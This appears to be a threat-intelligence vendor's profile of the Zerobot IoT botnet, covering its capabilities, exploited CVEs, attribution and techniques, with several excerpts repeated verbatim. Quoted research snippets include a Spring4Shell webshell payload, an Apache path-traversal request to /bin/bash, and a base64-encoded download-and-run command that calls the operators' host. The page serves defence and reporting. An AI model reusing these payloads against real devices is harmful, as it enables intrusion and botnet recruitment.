Zerobot is a distributed denial-of-service botnet first observed in November 2022. Originally written in Go, it compromises internet-exposed IoT devices, routers, firewalls, cameras, and web applications through known vulnerabilities and brute-force attacks against weak or default SSH and Telnet credentials. It has been offered through a malware-as-a-service scheme and is also called ZeroStresser by its operators. Microsoft tracks the associated activity cluster as Storm-1061, formerly DEV-1061.
Zerobot combines scanning, self-replication, exploitation, payload installation, and remotely controlled attack modules. Early analyzed versions contained more than twenty exploit routines targeting products including Huawei and Dasan routers, Hikvision cameras, Apache HTTP Server, F5 BIG-IP, and Spring applications affected by Spring4Shell. Successful exploitation launches shell-based downloaders that retrieve and execute architecture-specific payloads. The malware supports numerous processor architectures and runs on Linux and Windows, although its documented automatic propagation mechanisms do not spread to Windows machines.
Go-based versions communicate with command-and-control servers over WebSocket. Operators can launch or stop attacks, enable or disable scanning, update the malware, and execute arbitrary operating-system commands. DDoS capabilities cover TCP, UDP, HTTP, TLS, and ICMP traffic, with later versions adding additional flood methods. Persistence uses Windows startup execution and Linux desktop, daemon, and service mechanisms. Defense-evasion behaviors include string obfuscation, avoidance of honeypot-related networks, shell-history removal, and attempts to resist process termination. Infection payloads also attempt to terminate competing malware.
In early 2026, campaigns using the Zerobot name deployed a Mirai-based variant called zerobotv9 against Tenda routers through CVE-2025-7544 and the n8n workflow automation platform through CVE-2025-68613. Unlike the original Go implementation, this variant uses a smaller, UPX-packed binary with encrypted strings and browser-like user-agent strings. Its infection chain likewise uses a shell downloader to deploy multi-architecture botnet payloads.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
30 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting D-Link DNS-320 NAS.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Huawei HG532 routers.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting the miniigd SOAP service in Realtek SDK.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Digital Watchdog DW MEGApix IP cameras.
Lucifer Malware, BotenaGo Botnet and Zerobot Malware exploiting vulnerabilities on unpatched Dasan GPON home routers (CVE-2018-10562, CVE-2018-10561).
Listed under vulnerabilities exploited by a previously reported Zerobot variant: Spring MVC or Spring WebFlux application (Spring4Shell).
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Hikvision products.
Listed among additional vulnerabilities exploited by the new Zerobot variant, affecting Zivif PR115-204-P-RS.
Listed among additional vulnerabilities exploited by the new Zerobot variant, affecting Grandstream.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Totolink A830R routers.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting phpMyAdmin.
Listed among additional vulnerabilities exploited by the new Zerobot variant, affecting WebAdmin of Sophos SG UTM.
Lucifer Malware, BotenaGo Botnet and Zerobot Malware exploiting vulnerabilities on unpatched Dasan GPON home routers (CVE-2018-10562, CVE-2018-10561).
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Zivif PR115-204-P-RS V2.3.4.2103 webcams.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Tenda AC15 AC1900 routers.
Listed among additional vulnerabilities exploited by the new Zerobot variant; coverage includes Apache.HTTP.Server.cgi-bin.Path.Traversal.
Listed among additional vulnerabilities exploited by the new Zerobot variant, affecting Roxy-WI.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Zyxel USG FLEX 100(W) firewalls.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Telesquare SDT-CW3B1 routers.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting TOTOLink A3000RU routers.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting Realtek Jungle SDK.
Listed among additional vulnerabilities exploited by the new Zerobot variant, affecting Apache Spark.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting FLIR AX8 thermal sensor cameras.
Listed under vulnerabilities exploited by a previously reported Zerobot variant, affecting TOTOLINK N600R routers.
In total, 36 different exploit sets are observed and Zerobot equips the largest exploit set with 22 entries.
In total, 36 different exploit sets are observed and Zerobot equips the largest exploit set with 22 entries.
In total, 36 different exploit sets are observed and Zerobot equips the largest exploit set with 22 entries.
In total, 36 different exploit sets are observed and Zerobot equips the largest exploit set with 22 entries.
In total, 36 different exploit sets are observed and Zerobot equips the largest exploit set with 22 entries.
Listed under 'Other vulnerabilities that may be associated with Zerobot', affecting Tenda ONT GPON AC1200 Dual band WiFi HG9.
2 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
Zerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware.
22 distinct techniques documented for this family, organized by ATT&CK tactic.
Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp ... first.prefix=tomcatwar ... Second request: GET /stupidRumor_war/tomcatwar.jsp?pwd=j&cmd=
Daemon: Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
Daemon: Copies itself to /usr/bin/sshf and writes a configuration at /etc/init/sshf.conf.
CVE-2021-41773 Apache webserver Path Traversal ... CVE-2021-42013 Apache webserver Path Traversal No.2 ... POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/bash
The exploit code below is used with base64 encoding ... echo d2dldCBodHRwOi8vemVyby5zdWRvbGl0ZS5tbC96ZXJvLnNo ... | base64 -d | bash
This Go method is called CVE-2017-17106 in the malware binary, which is a completely different vulnerability ... These two exploits are contained in the same Go method inside the malware binary called CVE-2018-12613, which is a completely different vulnerability
Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices.
killall i .i mozi.m Mozi.m mozi.a Mozi.a kaiten Nbrute minerd /bin/busybox || pkill -9 -f i .i mozi.m Mozi.m mozi.a Mozi.a sora phantom zero kaiten Nbrute minerd /bin/busybox
91 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
16 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
CVE-2025-68613 (Remote Code Execution) ... Public Exploit exists Zerobot Malware News
Referenced as a newer Mirai fork with added Windows infection capability.
Mirai-derived botnet malware targeting IoT devices and exposed services (notably Tenda AC1206 routers and n8n). It spreads via exploitation of RCE flaws, drops a shell script (tol.sh) to fetch and execute the main multi-architecture payload (zerobotv9), and provides DDoS-style attack capabilities (e.g., TCPXmas, Mixamp) plus additional methods (SSH, Discord).
Mirai-based botnet exploiting vulnerabilities in both traditional IoT (routers) and enterprise-adjacent automation platforms (n8n) to expand infections; may increase organizational risk by enabling compromise of more critical infrastructure.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.